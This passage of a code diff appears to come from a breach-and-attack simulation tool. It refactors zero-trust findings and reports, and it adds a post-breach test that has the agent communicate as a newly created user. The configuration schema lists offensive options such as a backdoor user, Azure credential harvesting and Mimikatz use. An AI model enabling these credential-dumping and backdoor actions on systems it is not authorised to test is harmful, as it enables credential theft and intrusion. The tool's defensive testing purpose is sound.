:raises: Assertion error if this is used when there's more then one finding which fits the query - this is not
|
||||
when this function should be used.
|
||||
"""
|
||||
existing_findings = Finding.objects(test=test, status=status)
|
||||
assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status)
|
||||
|
||||
if len(existing_findings) == 0:
|
||||
Finding.save_finding(test, status, events)
|
||||
else:
|
||||
# Now we know for sure this is the only one
|
||||
orig_finding = existing_findings[0]
|
||||
orig_finding.add_events(events)
|
||||
orig_finding.save()
|
||||
|
||||
|
||||
def add_malicious_activity_to_timeline(events):
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||
status=STATUS_VERIFY,
|
||||
events=events
|
||||
)
|
|
@ -14,12 +14,12 @@ from monkey_island.cc.models.zero_trust.event import Event
|
|||
class Finding(Document):
|
||||
"""
|
||||
This model represents a Zero-Trust finding: A result of a test the monkey/island might perform to see if a
|
||||
specific recommendation of zero trust is upheld or broken.
|
||||
specific principle of zero trust is upheld or broken.
|
||||
|
||||
Findings might have the following statuses:
|
||||
Failed ❌
|
||||
Meaning that we are sure that something is wrong (example: segmentation issue).
|
||||
Inconclusive ⁉
|
||||
Verify ⁉
|
||||
Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
|
||||
Passed ✔
|
||||
Meaning that we are sure that something is correct (example: Monkey failed exploiting).
|
||||
|
@ -54,3 +54,7 @@ class Finding(Document):
|
|||
finding.save()
|
||||
|
||||
return finding
|
||||
|
||||
def add_events(self, events):
|
||||
# type: (list) -> None
|
||||
self.events.extend(events)
|
||||
|
|
|
@ -0,0 +1,53 @@
|
|||
from common.data.zero_trust_consts import *
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||
|
||||
|
||||
class TestAggregateFinding(IslandTestCase):
|
||||
def test_create_or_add_to_existing(self):
|
||||
self.fail_if_not_testing_env()
|
||||
self.clean_finding_db()
|
||||
|
||||
test = TEST_MALICIOUS_ACTIVITY_TIMELINE
|
||||
status = STATUS_VERIFY
|
||||
events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)]
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 0)
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)
|
||||
|
||||
def test_create_or_add_to_existing_2_tests_already_exist(self):
|
||||
self.fail_if_not_testing_env()
|
||||
self.clean_finding_db()
|
||||
|
||||
test = TEST_MALICIOUS_ACTIVITY_TIMELINE
|
||||
status = STATUS_VERIFY
|
||||
event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)
|
||||
events = [event]
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 0)
|
||||
|
||||
Finding.save_finding(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)
|
||||
|
||||
Finding.save_finding(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 2)
|
||||
|
||||
with self.assertRaises(AssertionError):
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
|
@ -14,7 +14,7 @@ REPORT_TYPES = [SECURITY_REPORT_TYPE, ZERO_TRUST_REPORT_TYPE]
|
|||
|
||||
REPORT_DATA_PILLARS = "pillars"
|
||||
REPORT_DATA_FINDINGS = "findings"
|
||||
REPORT_DATA_RECOMMENDATIONS_STATUS = "recommendations"
|
||||
REPORT_DATA_PRINCIPLES_STATUS = "principles"
|
||||
|
||||
__author__ = ["itay.mizeretz", "shay.nehmad"]
|
||||
|
||||
|
@ -33,8 +33,8 @@ class Report(flask_restful.Resource):
|
|||
"grades": ZeroTrustService.get_pillars_grades()
|
||||
}
|
||||
)
|
||||
elif report_data == REPORT_DATA_RECOMMENDATIONS_STATUS:
|
||||
return jsonify(ZeroTrustService.get_recommendations_status())
|
||||
elif report_data == REPORT_DATA_PRINCIPLES_STATUS:
|
||||
return jsonify(ZeroTrustService.get_principles_status())
|
||||
elif report_data == REPORT_DATA_FINDINGS:
|
||||
return jsonify(ZeroTrustService.get_all_findings())
|
||||
|
||||
|
|
|
@ -111,6 +111,14 @@ SCHEMA = {
|
|||
"title": "Back door user",
|
||||
"attack_techniques": []
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"CommunicateAsNewUser"
|
||||
],
|
||||
"title": "Communicate as new user",
|
||||
"attack_techniques": []
|
||||
},
|
||||
],
|
||||
},
|
||||
"finger_classes": {
|
||||
|
@ -329,6 +337,7 @@ SCHEMA = {
|
|||
"$ref": "#/definitions/post_breach_acts"
|
||||
},
|
||||
"default": [
|
||||
"CommunicateAsNewUser"
|
||||
],
|
||||
"description": "List of actions the Monkey will run post breach"
|
||||
},
|
||||
|
@ -406,7 +415,7 @@ SCHEMA = {
|
|||
"title": "Harvest Azure Credentials",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"attack_techniques": ["T1003", "T1078"],
|
||||
"attack_techniques": ["T1003"],
|
||||
"description":
|
||||
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
||||
},
|
||||
|
@ -421,7 +430,7 @@ SCHEMA = {
|
|||
"title": "Should use Mimikatz",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"attack_techniques": ["T1003", "T1078"],
|
||||
"attack_techniques": ["T1003"],
|
||||
"description": "Determines whether to use Mimikatz"
|
||||
},
|
||||
}
|
||||
|
|
|
@ -7,7 +7,7 @@ from botocore.exceptions import UnknownServiceError
|
|||
|
||||
from common.cloud.aws_instance import AwsInstance
|
||||
from monkey_island.cc.environment.environment import load_server_configuration_from_file
|
||||
from monkey_island.cc.resources.exporter import Exporter
|
||||
from monkey_island.cc.services.reporting.exporter import Exporter
|
||||
|
||||
__authors__ = ['maor.rayzin', 'shay.nehmad']
|
||||
|
|
@ -1,16 +1,16 @@
|
|||
import logging
|
||||
|
||||
from monkey_island.cc.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.resources.aws_exporter import AWSExporter
|
||||
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.reporting.aws_exporter import AWSExporter
|
||||
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
|
||||
|
||||
from monkey_island.cc.environment.environment import env
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def populate_exporter_list():
|
||||
manager = ReportExporterManager()
|
||||
RemoteRunAwsService.init()
|
||||
if RemoteRunAwsService.is_running_on_aws():
|
||||
if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
|
||||
manager.add_exporter_to_list(AWSExporter)
|
||||
|
||||
if len(manager.get_exporters_list()) != 0:
|
|
@ -12,7 +12,7 @@ from six import text_type
|
|||
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
|
||||
from monkey_island.cc.database import mongo
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.config import ConfigService
|
||||
from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
|
||||
from monkey_island.cc.services.edge import EdgeService
|
||||
|
|
|
@ -27,9 +27,9 @@ class ReportExporterManager(object):
|
|||
self._exporters_set.add(exporter)
|
||||
|
||||
def export(self, report):
|
||||
try:
|
||||
for exporter in self._exporters_set:
|
||||
logger.debug("Trying to export using " + repr(exporter))
|
||||
for exporter in self._exporters_set:
|
||||
logger.debug("Trying to export using " + repr(exporter))
|
||||
try:
|
||||
exporter().handle_report(report)
|
||||
except Exception as e:
|
||||
logger.exception('Failed to export report, error: ' + e.message)
|
||||
except Exception as e:
|
||||
logger.exception('Failed to export report, error: ' + e.message)
|
|
@ -11,12 +11,12 @@ def save_example_findings():
|
|||
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2
|
||||
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1
|
||||
# devices unexecuted = 1
|
||||
# people inconclusive = 1
|
||||
# networks inconclusive = 1
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_INCONCLUSIVE, [])
|
||||
# people inconclusive = 2
|
||||
# networks inconclusive = 2
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_INCONCLUSIVE, [])
|
||||
# people verify = 1
|
||||
# networks verify = 1
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||
# people verify = 2
|
||||
# networks verify = 2
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||
# data failed 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||
# data failed 2
|
||||
|
@ -27,10 +27,10 @@ def save_example_findings():
|
|||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||
# data failed 5
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||
# data inconclusive 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_INCONCLUSIVE, [])
|
||||
# data inconclusive 2
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_INCONCLUSIVE, [])
|
||||
# data verify 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||
# data verify 2
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||
# data passed 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, [])
|
||||
|
||||
|
@ -45,49 +45,49 @@ class TestZeroTrustService(IslandTestCase):
|
|||
expected = [
|
||||
{
|
||||
STATUS_FAILED: 5,
|
||||
STATUS_INCONCLUSIVE: 2,
|
||||
STATUS_VERIFY: 2,
|
||||
STATUS_PASSED: 1,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
"pillar": "Data"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 2,
|
||||
STATUS_VERIFY: 2,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
"pillar": "People"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 2,
|
||||
STATUS_VERIFY: 2,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 2,
|
||||
STATUS_UNEXECUTED: 4,
|
||||
"pillar": "Networks"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 1,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 2,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
"pillar": "Devices"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0,
|
||||
"pillar": "Workloads"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
STATUS_UNEXECUTED: 3,
|
||||
"pillar": "Visibility & Analytics"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0,
|
||||
"pillar": "Automation & Orchestration"
|
||||
|
@ -98,49 +98,51 @@ class TestZeroTrustService(IslandTestCase):
|
|||
|
||||
self.assertEquals(result, expected)
|
||||
|
||||
def test_get_recommendations_status(self):
|
||||
def test_get_principles_status(self):
|
||||
self.fail_if_not_testing_env()
|
||||
self.clean_finding_db()
|
||||
|
||||
self.maxDiff = None
|
||||
|
||||
save_example_findings()
|
||||
|
||||
expected = {
|
||||
AUTOMATION_ORCHESTRATION: [],
|
||||
DATA: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_DATA_TRANSIT],
|
||||
"principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT],
|
||||
"status": STATUS_FAILED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_FAILED,
|
||||
"test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_FAILED,
|
||||
"test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
DEVICES: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_ENDPOINT_SECURITY],
|
||||
"principle": PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY],
|
||||
"status": STATUS_FAILED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_FAILED,
|
||||
"test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
NETWORKS: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_SEGMENTATION],
|
||||
"principle": PRINCIPLES[PRINCIPLE_SEGMENTATION],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
|
@ -150,17 +152,27 @@ class TestZeroTrustService(IslandTestCase):
|
|||
]
|
||||
},
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_USER_BEHAVIOUR],
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||
"status": STATUS_VERIFY,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"status": STATUS_VERIFY,
|
||||
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC],
|
||||
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
|
@ -168,23 +180,53 @@ class TestZeroTrustService(IslandTestCase):
|
|||
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
],
|
||||
PEOPLE: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_USER_BEHAVIOUR],
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||
"status": STATUS_VERIFY,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"status": STATUS_VERIFY,
|
||||
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
"Visibility & Analytics": [
|
||||
VISIBILITY_ANALYTICS: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC],
|
||||
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
|
@ -192,12 +234,23 @@ class TestZeroTrustService(IslandTestCase):
|
|||
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
],
|
||||
"Workloads": []
|
||||
WORKLOADS: []
|
||||
}
|
||||
|
||||
self.assertEquals(ZeroTrustService.get_recommendations_status(), expected)
|
||||
result = ZeroTrustService.get_principles_status()
|
||||
self.assertEquals(result, expected)
|
||||
|
||||
def test_get_pillars_to_statuses(self):
|
||||
self.fail_if_not_testing_env()
|
||||
|
@ -222,8 +275,8 @@ class TestZeroTrustService(IslandTestCase):
|
|||
expected = {
|
||||
AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED,
|
||||
DEVICES: STATUS_FAILED,
|
||||
NETWORKS: STATUS_INCONCLUSIVE,
|
||||
PEOPLE: STATUS_INCONCLUSIVE,
|
||||
NETWORKS: STATUS_VERIFY,
|
||||
PEOPLE: STATUS_VERIFY,
|
||||
VISIBILITY_ANALYTICS: STATUS_UNEXECUTED,
|
||||
WORKLOADS: STATUS_UNEXECUTED,
|
||||
DATA: STATUS_FAILED
|
||||
|
|
|
@ -17,7 +17,7 @@ class ZeroTrustService(object):
|
|||
pillar_grade = {
|
||||
"pillar": pillar,
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0
|
||||
}
|
||||
|
@ -39,30 +39,30 @@ class ZeroTrustService(object):
|
|||
return pillar_grade
|
||||
|
||||
@staticmethod
|
||||
def get_recommendations_status():
|
||||
all_recommendations_statuses = {}
|
||||
def get_principles_status():
|
||||
all_principles_statuses = {}
|
||||
|
||||
# init with empty lists
|
||||
for pillar in PILLARS:
|
||||
all_recommendations_statuses[pillar] = []
|
||||
all_principles_statuses[pillar] = []
|
||||
|
||||
for recommendation, recommendation_tests in RECOMMENDATIONS_TO_TESTS.items():
|
||||
for pillar in RECOMMENDATIONS_TO_PILLARS[recommendation]:
|
||||
all_recommendations_statuses[pillar].append(
|
||||
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||
for pillar in PRINCIPLES_TO_PILLARS[principle]:
|
||||
all_principles_statuses[pillar].append(
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[recommendation],
|
||||
"tests": ZeroTrustService.__get_tests_status(recommendation_tests),
|
||||
"status": ZeroTrustService.__get_recommendation_status(recommendation_tests)
|
||||
"principle": PRINCIPLES[principle],
|
||||
"tests": ZeroTrustService.__get_tests_status(principle_tests),
|
||||
"status": ZeroTrustService.__get_principle_status(principle_tests)
|
||||
}
|
||||
)
|
||||
|
||||
return all_recommendations_statuses
|
||||
return all_principles_statuses
|
||||
|
||||
@staticmethod
|
||||
def __get_recommendation_status(recommendation_tests):
|
||||
def __get_principle_status(principle_tests):
|
||||
worst_status = STATUS_UNEXECUTED
|
||||
all_statuses = set()
|
||||
for test in recommendation_tests:
|
||||
for test in principle_tests:
|
||||
all_statuses |= set(Finding.objects(test=test).distinct("status"))
|
||||
|
||||
for status in all_statuses:
|
||||
|
@ -72,9 +72,9 @@ class ZeroTrustService(object):
|
|||
return worst_status
|
||||
|
||||
@staticmethod
|
||||
def __get_tests_status(recommendation_tests):
|
||||
def __get_tests_status(principle_tests):
|
||||
results = []
|
||||
for test in recommendation_tests:
|
||||
for test in principle_tests:
|
||||
test_findings = Finding.objects(test=test)
|
||||
results.append(
|
||||
{
|
||||
|
@ -124,7 +124,7 @@ class ZeroTrustService(object):
|
|||
def get_statuses_to_pillars():
|
||||
results = {
|
||||
STATUS_FAILED: [],
|
||||
STATUS_INCONCLUSIVE: [],
|
||||
STATUS_VERIFY: [],
|
||||
STATUS_PASSED: [],
|
||||
STATUS_UNEXECUTED: []
|
||||
}
|
||||
|
|
|
@ -1,7 +1,27 @@
|
|||
from monkey_island.cc.database import mongo
|
||||
from common.data.post_breach_consts import *
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication
|
||||
|
||||
|
||||
def process_communicate_as_new_user_telemetry(telemetry_json):
|
||||
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||
message = telemetry_json['data']['result'][0]
|
||||
success = telemetry_json['data']['result'][1]
|
||||
test_new_user_communication(current_monkey, success, message)
|
||||
|
||||
|
||||
POST_BREACH_TELEMETRY_PROCESSING_FUNCS = {
|
||||
POST_BREACH_COMMUNICATE_AS_NEW_USER: process_communicate_as_new_user_telemetry,
|
||||
}
|
||||
|
||||
|
||||
def process_post_breach_telemetry(telemetry_json):
|
||||
mongo.db.monkey.update(
|
||||
{'guid': telemetry_json['monkey_guid']},
|
||||
{'$push': {'pba_results': telemetry_json['data']}})
|
||||
|
||||
post_breach_action_name = telemetry_json["data"]["name"]
|
||||
if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS:
|
||||
POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json)
|
||||
|
||||
|
|
|
@ -1,10 +1,13 @@
|
|||
from monkey_island.cc.services.node import NodeService
|
||||
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field
|
||||
from monkey_island.cc.services.telemetry.zero_trust_tests.tunneling import test_tunneling_violation
|
||||
|
||||
|
||||
def process_tunnel_telemetry(telemetry_json):
|
||||
test_tunneling_violation(telemetry_json)
|
||||
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"]
|
||||
if telemetry_json['data']['proxy'] is not None:
|
||||
tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
|
||||
tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(telemetry_json)
|
||||
NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip)
|
||||
else:
|
||||
NodeService.unset_all_monkey_tunnels(monkey_id)
|
||||
|
|
|
@ -11,3 +11,8 @@ def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
|
|||
dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)
|
||||
|
||||
return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
|
||||
|
||||
|
||||
def get_tunnel_host_ip_from_proxy_field(telemetry_json):
|
||||
tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
|
||||
return tunnel_host_ip
|
||||
|
|
|
@ -3,8 +3,8 @@ import json
|
|||
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \
|
||||
STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||
from monkey_island.cc.services.telemetry.zero_trust_tests.known_anti_viruses import ANTI_VIRUS_KNOWN_PROCESS_NAMES
|
||||
|
||||
|
||||
|
@ -31,7 +31,9 @@ def test_antivirus_existence(telemetry_json):
|
|||
test_status = STATUS_PASSED
|
||||
else:
|
||||
test_status = STATUS_FAILED
|
||||
Finding.save_finding(test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events)
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events
|
||||
)
|
||||
|
||||
|
||||
def filter_av_processes(telemetry_json):
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \
|
||||
STATUS_PASSED
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
|
||||
COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}"
|
||||
COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \
|
||||
"New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}"
|
||||
|
||||
|
||||
def test_new_user_communication(current_monkey, success, message):
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
test=TEST_COMMUNICATE_AS_NEW_USER,
|
||||
# If the monkey succeeded to create a user, then the test failed.
|
||||
status=STATUS_FAILED if success else STATUS_PASSED,
|
||||
events=[
|
||||
get_attempt_event(current_monkey),
|
||||
get_result_event(current_monkey, message, success)
|
||||
]
|
||||
)
|
||||
|
||||
|
||||
def get_attempt_event(current_monkey):
|
||||
tried_to_communicate_event = Event.create_event(
|
||||
title="Communicate as new user",
|
||||
message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname),
|
||||
event_type=EVENT_TYPE_MONKEY_NETWORK)
|
||||
return tried_to_communicate_event
|
||||
|
||||
|
||||
def get_result_event(current_monkey, message, success):
|
||||
message_format = COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT
|
||||
|
||||
return Event.create_event(
|
||||
title="Communicate as new user",
|
||||
message=message_format.format(current_monkey.hostname, message),
|
||||
event_type=EVENT_TYPE_MONKEY_NETWORK)
|
|
@ -3,8 +3,8 @@ import json
|
|||
from common.data.network_consts import ES_SERVICE
|
||||
from common.data.zero_trust_consts import *
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||
|
||||
HTTP_SERVERS_SERVICES_NAMES = ['tcp-80']
|
||||
|
||||
|
@ -55,20 +55,16 @@ def test_open_data_endpoints(telemetry_json):
|
|||
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||
))
|
||||
|
||||
Finding.save_finding(
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
test=TEST_DATA_ENDPOINT_HTTP,
|
||||
status=found_http_server_status,
|
||||
events=events
|
||||
)
|
||||
|
||||
Finding.save_finding(
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
